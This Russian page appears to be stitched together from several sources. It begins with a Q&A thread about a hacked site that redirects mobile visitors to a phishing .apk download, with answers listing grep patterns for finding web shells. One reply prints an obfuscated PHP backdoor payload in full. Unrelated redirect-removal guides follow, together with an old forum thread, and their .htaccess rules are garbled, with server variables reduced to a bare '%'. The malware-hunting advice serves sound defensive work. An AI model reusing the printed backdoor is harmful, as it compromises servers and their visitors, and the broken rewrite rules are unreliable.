Как убрать редирект с сайта

Как убрать редирект с сайта?

Неделю назад обнаружил, что при входе на сайт с мобильных устройств (смартфон, планшет) происходит редирект на фишинговую страницу newflashplayer.ru и сразу же на мобильное устройство скачивается .apk-файл. Захожу с десктопного браузера — всё в порядке.

Проверил — файл .htaccess в порядке (не изменялся).

Проверил дату изменения js-скриптов — тоже никаких новых или недавно отредактированных…

Подскажите, куда еще посмотреть?

• Вопрос задан более трёх лет назад
• 26876 просмотров

Комментировать
Решения вопроса 1

на сервере одно из клиентов тоже самое было редирект точно тудаже
всё дело было в JS файлах
;document.write(unescape(«%3C%73

Ответ написан более трёх лет назад
Нравится 1 1 комментарий
eafanasov @eafanasov Автор вопроса
да, так и есть.
Ответы на вопрос 10
Поставь себе User agent какой-нибудь мобилки и смотри исходный код страницы.
Ответ написан более трёх лет назад
Комментировать
Нравится 2 Комментировать
Hungry_Hunter @Hungry_Hunter

Помимо файла htaccess следует произвести поиск в php файлах по следующим вхождениям:
— eval
— base64_decode
— Location
— по адресу редиректа

В js файлах так же следует проверить наличие редиректа. Дата редактирования файла не обязательно должна отличаться от остальных, т.к. изменить ее после редактирования не составляет труда.

А вообще лучше обратиться к специалисту для удаления вредоносного кода и поиска вебшелов на вашем сервере.

Ответ написан более трёх лет назад
Комментировать
Нравится 2 Комментировать

Вёбных дел мастер

Крайне рекомендую зайти на сайт из поисковиков. Не важно, из какого браузера. Тоже может оказаться, что идет редирект. И скорее всего окажется, что их генерит уже сам движок без JS-ов.

Ответ написан более трёх лет назад
Комментировать
Нравится 2 Комментировать
Stalker_RED @Stalker_RED
А в самой странице нет яваскриптовых вставок? Да и дату изменения файла можно изменить.
Ответ написан более трёх лет назад
Комментировать
Нравится 1 Комментировать

Спросил у автора в личке адрес сайта, посмотрел. Там действительно в конце javascript файлов (всех) есть строка которая начинается с:
document.write(unescape(
все эти строки надо убрать, а директорию где они лежат — закрыть на запись от имени юзера под которым работает веб-сервер. Если папка создавалась по ФТП — обычно достаточно выставить права 775.
(а дата изменения файла легко подделывается, поэтому вы и не стали туда смотреть — а зря)

И скорее всего у вас залит веб-шелл, его тоже можно поискать — скачиваете себе копию сайта и ищете в РНР файлах следующее:
eval(
/.*/e
passthru
(эти строки могут и в обычных файлах встречаться)

Но не факт что найдете все шеллы так, поэтому для надежности желательно удалить все файлы, кроме картинок, и заново установить последнюю версию Джумлы (и всех плагинов которые у вас стоят).
И правильно проставить права на папки — в тех папках, в которые может писать вебсервер, надо запретить исполнение PHP файлов:
php_flag engine 0
в файлике .htaccess в этих директориях.

Ответ написан более трёх лет назад
Нравится 1 2 комментария

пора уже выдумывать тулзу для поиска ШЕЛЛов.

раньше было просто WSO в поиск вбил и хорошо, а щас шифруют всё глубже и глубже но да основнйо признак
eval(
да preg_match(/.*/e,»»

Может вы все-таки preg_replace имели в виду? А вообще можно оставлять бэкдоры с create_function, array_map, call_user_func, etc и делать это так, что регулярками не отгрепаешь.

думаю у вас ДЛЕ, встречал такое… проверьте файлы сайта на наличие перенаправлений.
Если ДЛЕ — ищите в index.php, engine/data.config.php что-то c «Location:» — найдете — будет заметно, что оно чужее.
редирект может быть в заголовке страницы — php отдает header с указанием на перенаправление

Ответ написан более трёх лет назад
Комментировать
Нравится Комментировать

Николай Сумрак @NikolasSumrak
Senior PHP Developer

Проследите, на какую страницу изначально идет редирект, а затем сделайте поиск по всем файлам проекта с этим url-ом.

Ответ написан более трёх лет назад

Поиск не поможет, если было внедрение в js файлы, так как зачастую этот код закодирован как минимум в base64.

vinograd19 @vinograd19
meta тэги посмотрите
Ответ написан более трёх лет назад
Комментировать
Нравится Комментировать

Есть такой вариант.
Т.к. идёт редирект для мобильных платформ, то с большой долей вероятности в коде появится название платформы. Мне в аналогичной ситуации помог

grep "android" -r ./ 

Ну конечно, если у вас не сайт про android 🙂

Ответ написан более трёх лет назад
Комментировать
Нравится Комментировать

а файде data/config.php создается постоянно такая запись. Кто знает что это?

$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVftv2zYQ/lccwDAl2JZj+R1DaNbC2IIN7ZYmG4Y2EyjpLLGWRJWPuO6Y/31HyY2TxnCxH3R8fXe87x5iW3Kx0zIgYUhaHtHSShD1glmRhJwsneFiNu5b0R3PpvO+Fe6rWIs8LHSuWCghh1g5bbHutcM37979erVyLwoVClomtXJvvDj33SVbO0xKQOQe9aHdOHDnuv9e4kHM+YaBs9/tvYB1hz3FCnDc7nw698c9MiDu8gHNOpcvsEFA5sPJ2J/MFsTl4hRifv5DxPCHCJ8cJ0HO/eHMn458f0wO3i9Gw8b7thYsQLvvV9d/rq4/kOvVH7er9zfh7fUVuVtiSJ8cSiUE3Ds4KK6rCoRDBAhYY8YqpTJ04M7GGM8rLh2ikyxJdSryDV1vPkOiN5L0CIvh01fingXBmuYSXESXMZUQF9VjXnqPGci4/LZwl5d2GZxyR0meHXxxxnN/0reiO8Z89a3AwuHVzmkMvygWfzad9KwCBgaJnebOhA6VBP0ZRH1dBjTB/T2SjF6x1NZw7KmmrpWVg4oWYCeKyYHc1ADI6mEQx3b0ZGUHWvQfcbXiRbOP5FoXpZ1xpmityH8jLo4dCVzUN60DHATdYotAGfMEbG9YSEUFXq9ABB/bG9htuUhQCxcSOloEQ1Q7QjR4muUOcv3OOMmUqi4G1k0bV5QId92ls5hM+/h1h6OR37di37ZYpbxSIRWCYioQ3GtrmR7SgDq9Efasu4QvTNmacsb+cPiPFW6n02IFTcHmsQCRIjms4UPJIFOXRvJJMaFP2Kb2itMJVSWkNBQg9aGG/n8HtKEo8jVlfM01BARbgNQMzg5N9svNze/hLa7Cn35evb0hd7a5Txxjl9f9f1YJSMOCqjhzyCCiLNGGUYxjnBnO0xwMSwtqXnNlMIzwxUQ4qxhWpVnlil6Vxobf0IxzQ4sI8X+N3oTmb/pa8K3BnNqdFJQpKMu9ASNNXvDHggSe3V2b99B2icVkGk9qJWEk1P7IgvlG8pRrIzMo0S1WSkVTs7PXe6aQpRcbrXQEhicl3+Dci3YNg9o5YbZMWfN84wlt7jdezI3OeWrWNIYIbdScPZPoeGM/U9J7hFOeo2URxZ6JWJk2PGxVWBbPaVRehMwlKpWJ4CwxBUsqsysiRkuTqTjEjZIZiTtcGh4xDNAnvwADgoH82JqemyrjJRxCZcv37LtXhiQ5hBpvCVmCuT6KObxE9ekzLwOaJCVspaEJuuNVWWWC3EZWmWANkEQUuePGtzPUZdIGrsbjVFDFeNk4KVhzhZ21zoKWfQWOPxz752tGjj16Dw//AYlYkeQ=')));";$release_this = "cre"."ate_"."function";if (@function_exists($release_this)) //$dle_lik = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6dVG1v2zgM/ispEFQ21jlp0y5tA2O9DcGuuMO668uGYSsM2WZsXWzRJ8nNirH//Si7Q9qty4B9sGhJD18ekuLQ1qpSFmORiEEkktavFky3UX7NExQztQiUteCCYfL67Oyv0/mn4b3idRh+PeGbDHGpIPh2vPMj8NnujlM1BOGzw4Ojg+mOGIlwdseWg5MfwXEsjvb2p+PJ9EiEaDZCDse/huz+GrInfkJFjCfj/enB0f50ItYUDqcHPYWhWcRs+GJ+/n5+/sk6Y+AmYOGwbRowgTBgYAEmaZwr2cf1bNga9UBFnM//uZpfXCZX56eCbxm92aAybeIstP9xnby9k2GJNt6k4SyWa/8lyJxP73Fi8lIVWdTUzpd7ZFXpRv5vmUGZdUdZFnlZGPTi+WTVnY6ObdOpuHJwrLFrFic7DfxbhCy2LWDXSUyIhZGr1lSgM8w5u2bRQRppZA0OTPx5uITbFZqc1XhjYbs18S7rPcEnfpjTbSb1nXVROtccjzwPnxteGR6GM/ii3Ozudypmi80qTkMhEwO2XWv53t5al/nPy8t3yRXvkj/ezN9eimvfkhuuuTW7rt1qDBRJLV1WBmKUSpW3lDFXkiUiqaKW9AodNYqLSrJOK6CP8pXBFXFOePNh8jqheeXkqaYPBTiSOocvpGQiTVYSYsGglC3UUlXRSIkdTzfk18AEHvnuFKMeZ0hp62TBfjWXj/q4WtemwGuU3vaRYa5xSW2FBS1kBilGhMvItHSzjDLsnUeUt9nSf2SxwJZsCZp1tbzxjLCKsp6XoZVy3pmFLvRbnwGOx2pG8HPdI5NmEaVKFz0PbrKOxWMaTZRydnjKEaaKuf+7VwPd1qmSmixLtKRzgyqnWuUNgVFgPw9ejKl0WcJnWlFTooZ1qjgxwdZ3E1LkFSQte0lUzrV+EvNginbXj8KMZZ5rWFni5CkdNWVDMq/v//gFFMr6XMQLgDyVnLy48tlzPYovjXQKdR+lUb0L/zfYigd+dP1k3N0P3ql4al7f3f0P9ywaOQ==')));";$lic_true = "cre"."ate_"."function";if(@function_exists($lic_true)) //System Configurations

Ответ написан 15 февр. 2023
Комментировать
Нравится Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

• Android
• +1 ещё

Как корректно реализовать Базу данных в приложении на Андроид?

• 1 подписчик
• вчера
• 45 просмотров

Как убрать редирект 301

Редирект — это перенаправление посетителя страницы на другую, на тот случай, если посещаемая страница не работает или в ней находится неподходящая информация. Но иногда от редиректа приходится избавляться. Сейчас расскажу о трех способах сделать это.

Как убрать редирект через панель управления сервера

Описанный ниже метод подойдет тем, кто настроил панель управления ISPmanager и меняет параметры сервера через нее.

• Открываем, собственно, сам ISPmanager.
• Кликаем по меню «Домены» в боковой панели.
• В появившемся списке опций выбираем вариант WWW-домены.
• Выделяем домен, в котором хотим удалить редиректы, кликнув по нему мышью.
• А затем переходим в меню «Редиректы».
• Таким же образом выделяем любое существующее (уже настроенное) перенаправление.
• Следом нажимаем на кнопку «Удалить».
• Подтверждаем свое желание, нажав на кнопку ОК.

Если вы используете новую версию интерфейса ISPmanager, то инструкция для вас немного изменится. На том шаге, где надо зайти в меню «Редиректы», надо будет сначала нажать на кнопку «Скрипты». Это новое меню, в которое спрятали нужный нам пункт настроек. В остальном процесс ничем не отличается.

Пользователям Plesk придется полностью удалить домен, на котором уже настроено перенаправление, и создать новый. К сожалению, эта система иначе делит домены на категории, задавая им тип еще на этапе создания, и не оставляет другого способа убрать переадресацию.

Переадресация в ней задается еще в момент создания нового домена. В меню «Создать», когда выбирается тип хостинга, надо указать «Хостинг веб-сайтов», а не «Перенаправление». Тогда сайт будет функционировать должным образом. Больше ничего делать не нужно.

Но важно учесть, что при удалении домена вместе с ним будут удалены все связанные папки, веб-приложения и файлы.

Комьюнити теперь в Телеграм
Подпишитесь и будьте в курсе последних IT-новостей

Как отключить переадресацию в плагине Redirection для WordPress

Это инструкция для тех, кто делал редирект, как я писал тут . Через плагин Redirection для WordPress.

Чтобы такой удалить:

• Открываем настройки плагина.
• Кликаем по прямоугольнику напротив одного или нескольких редиректов (можно вообще всех, кликнув по пустому прямоугольнику рядом со словом Type).

• Затем ищем кнопку Delete и нажимаем на нее. Возможно, свое намерение придется подтвердить, нажав ОК или Accept.

После этого настроенная ранее переадресация перестанет работать. Но опять же, та, что была создана с помощью плагина.

Как убрать редирект через .htaccess на хостинге TimeWeb

Если вы изначально настраивали перенаправления, отредактировав файл .htaccess, то без труда сможете их там же убрать.

• Для начала открываем панель управления Timeweb.
• Кликаем по меню «Файловый менеджер».
• Находим там конфигурационный файл .htaccess и открываем его.

Затем переходим непосредственно к редактированию кода внутри.

Зачастую в .htaccess переадресация настраивается через директиву RewriteEngine. Поэтому базовый редирект с одного домена на другой будет выглядеть как-то так:

RewriteEngine on RewriteCond % ^(www\.)?old-domain\.ru$ RewriteRule ^(.*)$ http://www.new-domain.ru/$1 [R=301,L]

В случае с 301 редиректом какой-то отдельной страницы, запись в файле с настройками может выглядеть так:

RewriteBase / RewriteCond % !on RewriteCond % !^/Необходимая директория_страница$ RewriteRule ^(.*)$ https://%/$1 [R=301,L] RewriteCond % on [NC] RewriteCond % ^/Необходимая директория_страница$ RewriteRule ^(.*)$ http://%/$1 [R=301,L]

Встречают укороченные варианты записи вроде такой:

Redirect 301 / http://example.com/index.html

Независимо от типа, редирект выключить можно двумя способами.

1. Полностью стереть соответствующий код из .htaccess.
2. Или поставить перед ним значок #. Так мы его закомментируем, и он перестанет работать. Можно будет проверить, как поведет себя сайт, не удаляя переадресацию полностью. Потом можно легко все вернуть как было, удалив комментарии.

На этом все. Теперь вы знаете, как удалять и временно отключать редиректы в .htaccess и в панели управления. Этих трех способов должно хватить.

Как убрать редирект wordpress?

Для того, чтобы убрать редирект в WordPress, вам нужно выполнить следующие шаги:

1. Проверьте настройки перенаправления (redirect) в файле .htaccess. Откройте файл .htaccess в корневой папке вашего сайта и найдите следующие строки кода:

perl Copy code
# BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond % !-f RewriteCond % !-d RewriteRule . /index.php [L] # END WordPress 

Если эти строки кода присутствуют в файле, то они могут вызывать редирект на главную страницу сайта. В таком случае вы можете временно закомментировать эти строки кода, добавив символ «#» в начало каждой строки:

shell Copy code
# BEGIN WordPress # # RewriteEngine On # RewriteBase / # RewriteRule ^index\.php$ - [L] # RewriteCond % !-f # RewriteCond % !-d # RewriteRule . /index.php [L] #  # END WordPress 

1. Очистите кэш браузера. После внесения изменений в файл .htaccess, очистите кэш вашего браузера, чтобы убедиться, что изменения вступили в силу.
2. Проверьте настройки WordPress. Если вы все еще сталкиваетесь с проблемой редиректа, проверьте настройки WordPress. Зайдите в раздел «Настройки» -> «Общие» и убедитесь, что адрес сайта (URL) и адрес сайта WordPress (Адрес WordPress (URL)) указаны корректно.

Надеюсь, что эти советы помогут вам убрать редирект в WordPress. Если проблема остается, вы можете обратиться за дополнительной помощью к вашему веб-разработчику или хостинг-провайдеру.

Как убрать редиректы в wordpress?

# BEGIN WordPress RewriteEngine On RewriteBase / RewriteCond % !-f RewriteCond % !-d RewriteRule . /index.php [L] # END WordPress zatupokseo добавил 26.11.2008 в 01:00 Неужели нет ответа на этот вопрос? Мне не нужны редерикты с www на без или на оборот! Я хочу набирая в браузере домен с www попадать на домен с www., потом сразу же еще раз набрать свой домен без www и попасть на домен без www. Что непонятного? Как это сделать в вордпресс? Что где убрать?�� zatupokseo добавил 26.11.2008 в 01:02 . ��

На сайте с 19.06.2008
25 ноября 2008, 22:23

zatupokseo:
# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond % !-f
RewriteCond % !-d
RewriteRule . /index.php [L]

# END WordPress

это делает перенаправление с http://site.com/index.php на http://site.com/
RewriteCond % ^site.com
RewriteRule (.*) http://www.site.com/$1 [R=301,L]

это перенаправляет на www(и если прописать на выворот, то будет на домен без www), но у вас такого нету. ЗЫ. Ваш топик больше подходит для раздела «вебстроительство»